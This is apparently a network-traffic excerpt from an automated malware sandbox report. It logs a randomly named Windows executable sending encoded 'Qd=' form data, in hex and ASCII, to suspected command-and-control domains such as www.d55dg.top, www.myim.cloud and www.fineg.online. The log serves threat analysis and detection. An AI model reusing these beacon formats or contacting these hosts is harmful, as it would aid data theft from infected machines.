                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 4a 41 4e 67 58 43 4f 45 55 44 2f 45 43 58 31 73 56 48 64 38 69 4d 49 48 7a 74 35 4e 52 74 51 6a 46 6b 77 46 42 5a 45 55 56 32 38 52 6c 6f 30 43 32 30 68 55 36 30 75 57 73 30 30 4a 68 37 59 6f 79 6c 67 65 79 46 6d 6a 50 4a 5a 6b 6d 71 6f 4a 48 71 65 4e 77 30 37 78 6f 44 78 32 35 51 78 70 49 2f 55 42 50 39 42 31 52 52 51 68 7a 44 56 30 36 31 6c 45 42 68 58 59 71 51 46 4f 67 2b 37 6b 66 62 74 58 4d 63 64 53 39 69 6b 71 57 75 56 34 55 64 59 71 56 79 47 70 78 73 71 49 69 4f 62 64 7a 4d 76 32 42 35 4c 72 6f 4d 47 73 6d 4b 42 38 45 44 45 4a 73 45 46 58 51 72 53 72 4c 4a 44 50 37 30 67 4c 43 77 78 37 4a 54 4b 73 4d 35 64 54 58 2b 4f 51 6f 34 67 65 79 34 62 45 41 2f 39 54 55 48 7a 38 70 39 32 72 76 77 75 78 49 67 57 61 7a 75 37 31 4e 63 5a 53 70 4b 6b 31 50 38 35 61 63 5a 77 59 74 36 65 79 2b 77 5a 42 5a 57 76 36 4a 32 36 57 2b 53 52 64 6e 78 41 4b 59 65 78 58 2f 75 6b 6c 4b 41 79 69 62 74 71 63 32 6d 54 74 2f 4f 6c 53 6c 41 6b 67 43 64 31 77 52 44 6b 30 34 6f 6b [TRUNCATED]
                        Data Ascii: Qd=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtQjFkwFBZEUV28Rlo0C20hU60uWs00Jh7YoylgeyFmjPJZkmqoJHqeNw07xoDx25QxpI/UBP9B1RRQhzDV061lEBhXYqQFOg+7kfbtXMcdS9ikqWuV4UdYqVyGpxsqIiObdzMv2B5LroMGsmKB8EDEJsEFXQrSrLJDP70gLCwx7JTKsM5dTX+OQo4gey4bEA/9TUHz8p92rvwuxIgWazu71NcZSpKk1P85acZwYt6ey+wZBZWv6J26W+SRdnxAKYexX/uklKAyibtqc2mTt/OlSlAkgCd1wRDk04okNSRrbxBazTIVY3Ef82I4RNqqY8P+mRFPlLl1NCOGDI/uN6z50pynmoQGirzjNhLPZAjO4tdJTmkr23CBahw9R5uM7uaihDviNA/X5EkMzq1/nrOw8bmwGPMjFv+sSV2W8tBetGxfE7EdtZidS3gOwiZqmjbsBRzTkMUQfDefRp7YKsDE9wszVvr2AlFZeG5O/0k0mbzoBwG9W5YNAajcAzy9gBogy3/dPo3FIhxnT0d2e4e9sRSPseu2Q5XIdsHoVR+3dV66KbCSaAbz+elGDcgVvv2emQtCHQctRr7mwa8VJb4JIWQlxa9z/assmCBojqXqGQBMycHWohHYQqrZHnRW7sO8Zrt1xCgfMeQcKzWahQlCTiNSNHA3L9lNDJgJm0qV2fN7Vg8mHnk/ujcQPJZrmCJ+tOf7AH0UZieeoKTbH6CQvAP/cQOs4jZA33MPza6BiJIGdCWDS4AqgRw9E385V1oQRzQTpYqjFrBstjRr8OLk8o5eWrn4Q5JESz8ugEU5gu1m9/7KTrx3ttlwwn9uchd6IP/eG1F8NsTiVhCBIYBNorp3dGNQtOH/XOZk8VScHn6WxbUXDcAjI0dQUVpRylq1DpV9uctDvoBkcbQaNeIU5Jkrcjms5iQNK4H+cJjf46p+rg2EWTyXGi60RF+Kg9qGAg4jyg [TRUNCATED]
                        Sep 3, 2024 10:43:52.570928097 CEST1236INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:43:51 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1106
                        x-request-id: 4520012f-a568-4c5c-81c8-e61b7933324f
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                        set-cookie: parking_session=4520012f-a568-4c5c-81c8-e61b7933324f; expires=Tue, 03 Sep 2024 08:58:52 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:43:52.570943117 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDUyMDAxMmYtYTU2OC00YzVjLTgxYzgtZTYxYjc5MzMzMjRmIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.464978199.59.243.226804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:43:54.635910988 CEST440OUTGET /12ts/?Qd=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.myim.cloud
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:43:55.070641994 CEST1236INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:43:54 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1426
                        x-request-id: 5b586ea2-733a-403d-846d-8a8d6f84d65b
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tCi0V3syJ0av2aKsVxgp6Rd95rnnljzs5SbMQnv3wEApcl7xO2CQUcolgankZSmYTnH6IS0gfpez6vy40k/IxQ==
                        set-cookie: parking_session=5b586ea2-733a-403d-846d-8a8d6f84d65b; expires=Tue, 03 Sep 2024 08:58:55 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 43 69 30 56 33 73 79 4a 30 61 76 32 61 4b 73 56 78 67 70 36 52 64 39 35 72 6e 6e 6c 6a 7a 73 35 53 62 4d 51 6e 76 33 77 45 41 70 63 6c 37 78 4f 32 43 51 55 63 6f 6c 67 61 6e 6b 5a 53 6d 59 54 6e 48 36 49 53 30 67 66 70 65 7a 36 76 79 34 30 6b 2f 49 78 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tCi0V3syJ0av2aKsVxgp6Rd95rnnljzs5SbMQnv3wEApcl7xO2CQUcolgankZSmYTnH6IS0gfpez6vy40k/IxQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:43:55.070658922 CEST879INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWI1ODZlYTItNzMzYS00MDNkLTg0NmQtOGE4ZDZmODRkNjViIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.464979154.23.184.240804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:00.860408068 CEST703OUTPOST /ftud/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.d55dg.top
                        Origin: http://www.d55dg.top
                        Referer: http://www.d55dg.top/ftud/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 72 52 6b 74 5a 30 55 30 6c 71 76 69 62 35 46 6a 72 74 44 63 39 4a 45 4d 38 76 54 63 67 62 39 34 7a 76 52 5a 71 6e 42 4a 37 76 38 77 67 78 2f 42 6c 4b 63 32 54 70 76 71 56 36 52 31 34 47 35 55 4f 71 44 79 33 70 72 53 59 6a 54 66 54 4f 33 6d 5a 4e 51 6b 38 77 63 45 58 71 75 4b 37 73 34 52 5a 52 30 44 7a 41 45 55 52 75 41 76 45 52 59 66 44 5a 30 66 30 62 34 34 4a 6f 58 72 4b 30 6d 73 31 6d 46 75 69 38 6a 48 31 46 57 4b 48 5a 45 6b 54 6f 6b 72 59 64 66 62 43 67 50 61 2f 6e 56 6c 67 56 44 75 53 2b 57 7a 32 69 6a 78 71 70 2b 4f 31 44 33 4c 65 67 3d 3d
                        Data Ascii: Qd=PSOowArgf8yorRktZ0U0lqvib5FjrtDc9JEM8vTcgb94zvRZqnBJ7v8wgx/BlKc2TpvqV6R14G5UOqDy3prSYjTfTO3mZNQk8wcEXquK7s4RZR0DzAEURuAvERYfDZ0f0b44JoXrK0ms1mFui8jH1FWKHZEkTokrYdfbCgPa/nVlgVDuS+Wz2ijxqp+O1D3Leg==
                        Sep 3, 2024 10:44:01.742069006 CEST302INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:44:01 GMT
                        Content-Type: text/html
                        Content-Length: 138
                        Connection: close
                        ETag: "668fe68e-8a"
                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.464980154.23.184.240804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:03.404881954 CEST723OUTPOST /ftud/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.d55dg.top
                        Origin: http://www.d55dg.top
                        Referer: http://www.d55dg.top/ftud/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 70 78 34 74 55 7a 6f 30 67 4b 76 74 55 5a 46 6a 78 64 44 59 39 4f 4d 4d 38 74 2b 52 67 75 74 34 79 4f 68 5a 72 6a 74 4a 34 76 38 77 76 52 2f 45 68 4b 63 70 54 70 7a 69 56 2f 70 31 34 43 70 55 4f 72 7a 79 69 4f 48 56 65 6a 54 42 4b 2b 33 6b 61 39 51 6b 38 77 63 45 58 75 2b 67 37 73 67 52 5a 42 45 44 78 6b 59 58 63 4f 41 75 44 52 59 66 56 70 30 62 30 62 34 4b 4a 70 4b 4f 4b 32 75 73 31 6a 68 75 7a 49 33 47 2f 46 57 49 4a 35 46 37 66 34 52 41 59 73 69 46 49 41 65 38 34 58 5a 2f 6c 54 53 30 44 50 33 6b 6b 69 48 43 33 75 33 36 34 41 4b 43 46 73 4b 41 6e 49 69 6c 36 67 63 53 32 51 74 5a 73 49 66 2b 6f 43 67 3d
                        Data Ascii: Qd=PSOowArgf8yopx4tUzo0gKvtUZFjxdDY9OMM8t+Rgut4yOhZrjtJ4v8wvR/EhKcpTpziV/p14CpUOrzyiOHVejTBK+3ka9Qk8wcEXu+g7sgRZBEDxkYXcOAuDRYfVp0b0b4KJpKOK2us1jhuzI3G/FWIJ5F7f4RAYsiFIAe84XZ/lTS0DP3kkiHC3u364AKCFsKAnIil6gcS2QtZsIf+oCg=
                        Sep 3, 2024 10:44:04.255404949 CEST302INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:44:04 GMT
                        Content-Type: text/html
                        Content-Length: 138
                        Connection: close
                        ETag: "668fe68e-8a"
                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.464981154.23.184.240804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:05.977171898 CEST10805OUTPOST /ftud/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.d55dg.top
                        Origin: http://www.d55dg.top
                        Referer: http://www.d55dg.top/ftud/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 70 78 34 74 55 7a 6f 30 67 4b 76 74 55 5a 46 6a 78 64 44 59 39 4f 4d 4d 38 74 2b 52 67 75 6c 34 79 34 31 5a 71 45 35 4a 35 76 38 77 69 78 2f 46 68 4b 63 6b 54 70 72 59 56 2f 74 44 34 45 31 55 42 70 37 79 6d 50 48 56 4c 54 54 42 58 4f 33 6c 5a 4e 51 31 38 77 4d 41 58 71 61 67 37 73 67 52 5a 43 63 44 69 51 45 58 65 4f 41 76 45 52 59 70 44 5a 31 38 30 62 77 61 4a 70 4f 77 4a 46 32 73 37 6a 78 75 78 62 66 47 39 6c 57 4f 45 5a 46 7a 66 34 4e 66 59 74 4f 42 49 44 44 5a 34 56 46 2f 70 30 76 56 57 2b 37 49 2f 79 4f 52 67 63 44 4a 33 48 69 6a 4e 37 57 59 73 4a 36 58 34 44 30 6a 36 79 51 48 78 4b 6a 76 71 6c 35 62 7a 70 4b 73 2b 34 52 50 54 5a 41 62 75 70 57 69 32 37 54 49 4b 42 31 36 30 75 43 6b 57 6b 75 32 38 50 38 72 45 43 36 34 55 64 51 65 45 57 4a 74 79 58 67 44 55 70 63 2f 46 47 34 6e 69 6e 54 52 71 6e 46 77 7a 48 47 72 47 4a 54 72 6b 51 42 78 33 6b 6a 43 43 73 68 37 59 37 4f 7a 4b 46 4c 72 4a 4e 41 6b 72 32 6d 69 52 46 79 30 36 38 63 35 50 44 54 2f 2b 66 4f [TRUNCATED]
                        Data Ascii: Qd=PSOowArgf8yopx4tUzo0gKvtUZFjxdDY9OMM8t+Rgul4y41ZqE5J5v8wix/FhKckTprYV/tD4E1UBp7ymPHVLTTBXO3lZNQ18wMAXqag7sgRZCcDiQEXeOAvERYpDZ180bwaJpOwJF2s7jxuxbfG9lWOEZFzf4NfYtOBIDDZ4VF/p0vVW+7I/yORgcDJ3HijN7WYsJ6X4D0j6yQHxKjvql5bzpKs+4RPTZAbupWi27TIKB160uCkWku28P8rEC64UdQeEWJtyXgDUpc/FG4ninTRqnFwzHGrGJTrkQBx3kjCCsh7Y7OzKFLrJNAkr2miRFy068c5PDT/+fOuaxw9en4rF28tjXjkbxV5q3n90RvSl2CEOHREzhernEMwLH4iIfQ5NqS7Ae6lkerKCyPsbUBlHwe9MEhQjpAHyW9CRjYahYJLS+jUgyWLaWEU9I0JW3zi78g5FCap2TsOFI3nSs/eOuU2sVP6bQN9iSW4F0JbSIUSovI1qoExBmr8ijfaVjeYBEU5kRKDVwNHowZ/9fwG3d497IikIJdY8TX1Un/fN4C1m3/EGM9zNZLL9C6ly3o375FXYMeuNIQhJxQtk/eqh++0tPOoqvIvJKWRvx8XT1c3sEKB8hbBqMVsKZaOHpb9MVBbbsQ/xtjlj/pQmz/aNICfXGIE0poDXXVHZbXFYVVebqX2krEC+Azm20btG+kC8DwpnToUx2ENNBSyZJqkBjQA7kYrRWXDNm0XX24tf4MX5wFvNCooFXucwnquv1PTSUJhEVdeIuG4XGPXPpOTMQsa2bDJBxI9U2ILJhdNo9DXPcVYcfbdMOz0XSkrafwxWBPX9kNwRL84wr5II1N5/eknms9S/xC5KpWhlZHGDHtuSWpcmC7zYGglLPjgakNstzO4Uf3cAtfj8+lz0uw2syKK/WkCqrJKaqkDYiaRLRycTlSaAcl4J67YQH2gWtwpntMg7NDjh2AUExD70I/GkwiXYZ76iZqWhX9fp/6AGP1sK [TRUNCATED]
                        Sep 3, 2024 10:44:07.048290968 CEST302INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:44:06 GMT
                        Content-Type: text/html
                        Content-Length: 138
                        Connection: close
                        ETag: "668fe68e-8a"
                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.464982154.23.184.240804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:08.511388063 CEST439OUTGET /ftud/?0z=mDcdcR8&Qd=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.d55dg.top
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:44:09.372620106 CEST302INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:44:09 GMT
                        Content-Type: text/html
                        Content-Length: 138
                        Connection: close
                        ETag: "668fe68e-8a"
                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.464987162.0.239.141804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:27.963745117 CEST712OUTPOST /mkan/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.fineg.online
                        Origin: http://www.fineg.online
                        Referer: http://www.fineg.online/mkan/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 71 79 38 4f 6b 42 52 35 77 6a 31 34 4f 54 4f 57 57 4b 4d 34 50 76 42 44 73 37 67 68 63 6f 6d 77 68 45 43 6f 4a 39 44 39 30 48 43 57 66 50 41 49 72 2b 64 41 45 6a 6b 4e 64 35 64 64 65 61 4b 44 35 70 43 32 2f 51 42 2b 67 77 42 78 71 61 73 69 39 6b 4d 64 59 71 35 55 47 35 44 32 6b 71 6e 61 76 44 34 6a 57 33 76 6f 67 32 33 72 59 6f 7a 50 35 34 65 50 65 6b 58 35 4d 6f 63 68 6a 4c 43 2f 53 42 4d 49 57 4a 51 78 41 35 6c 32 78 54 47 4f 66 59 4a 36 41 4b 71 44 38 49 33 61 52 74 53 45 75 33 4d 43 48 6c 58 7a 61 58 69 78 63 70 45 38 69 35 2b 45 46 51 3d 3d
                        Data Ascii: Qd=z8pzi1wICkJUqy8OkBR5wj14OTOWWKM4PvBDs7ghcomwhECoJ9D90HCWfPAIr+dAEjkNd5ddeaKD5pC2/QB+gwBxqasi9kMdYq5UG5D2kqnavD4jW3vog23rYozP54ePekX5MochjLC/SBMIWJQxA5l2xTGOfYJ6AKqD8I3aRtSEu3MCHlXzaXixcpE8i5+EFQ==
                        Sep 3, 2024 10:44:28.528044939 CEST1236INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:44:28 GMT
                        Server: Apache
                        Content-Length: 18121
                        Connection: close
                        Content-Type: text/html
